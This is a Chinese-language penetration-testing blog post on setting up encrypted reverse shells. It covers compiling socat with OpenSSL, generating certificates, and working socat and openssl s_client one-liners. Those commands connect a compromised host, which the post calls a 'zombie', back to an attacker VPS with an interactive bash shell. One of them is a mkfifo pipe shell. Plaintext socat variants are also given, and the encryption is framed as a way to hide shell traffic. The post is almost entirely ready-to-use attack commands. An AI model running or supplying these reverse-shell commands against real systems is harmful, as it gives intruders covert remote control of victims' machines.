内网渗透 – 加密反弹shell

发布于 2022-11-14  35 次阅读


编译环境

#cetos8
yum install gcc-c++ 
yum install openssl-devel -y
yum install make -y
yum install readline-devel -y
wget http://www.dest-unreach.org/socat/download/socat-1.7.4.4.tar.gz 
tar -zxvf socat-1.7.4.4.tar.gz 
cd socat-1.7.4.4 & ./configure --enable-openssl-method
make
# 查看版本
./socat -V 

# 运行
Ubuntu 18.04.6 LTS 正常
CentOS Linux 8 正常
CentOS Stream9 报错 无法执行二进制文件,可执行文件格式错误
Ubuntu 20.04.5 LTS 报错:error while loading shared libraries: libreadline.so.7: cannot open shared object file

# 官方文档
http://www.dest-unreach.org/socat/doc/socat-openssltunnel.html
http://www.dest-unreach.org/socat/doc/socat.html#ADDRESS_OPENSSL_LISTEN
http://www.dest-unreach.org/socat/doc/CHANGES

证书生成

FILENAME=filename
openssl genrsa -out $FILENAME.key 2048
openssl req -new -key $FILENAME.key -x509 -days 3653 -out $FILENAME.crt
#[Common Name]设置为vps的外网ip
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

socat加密反弹shell

# 加密正向shell,可交互,但ctrl+c会退出shell
vps: ./socat openssl-listen:4433,reuseaddr,cert=filename.pem,cafile=filename.crt system:bash,pty,stderr 
肉鸡: ./socat readline openssl:x.x.x.x:4433,cert=filename.pem,cafile=filename.crt 

# 加密反弹shell,可交互,但ctrl+c会退出shell
vps: ./socat readline openssl-listen:4433,reuseaddr,cert=filename.pem,cafile=filename.crt
肉鸡: ./socat openssl:x.x.x.x:4433,cert=filename.pem,cafile=filename.crt system:bash,pty,stderr

#反弹shell,稳定的终端
vps:socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0
反弹:socat OPENSSL:x.x.x.x:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
加密的流量

socat未加密反弹shell

./socat file:tty,raw,echo=0 tcp-listen:4433
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:x.x.x.x:4433
执行netstat命令
明文的流量

openssl加密反弹shell

# 在vps上生成SSL证书的公钥/私钥对
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# 在vps上监听端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 80
# 在肉鸡上执行反弹
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect x.x.x.x:80 > /tmp/s; rm /tmp/s

#tips:

https://www.freebuf.com/articles/web/328278.html 关于渗透测试中的shell那些事

https://blog.maxkit.com.tw/2021/11/socat.html

https://thiscute.world/posts/socat-netcat/#3-%E6%8B%85%E5%BD%93%E4%B8%B4%E6%97%B6%E7%9A%84-web-%E6%9C%8D%E5%8A%A1%E5%99%A8

https://tw.coderbridge.com/questions/3534af0968df4025a68916df1c5de76c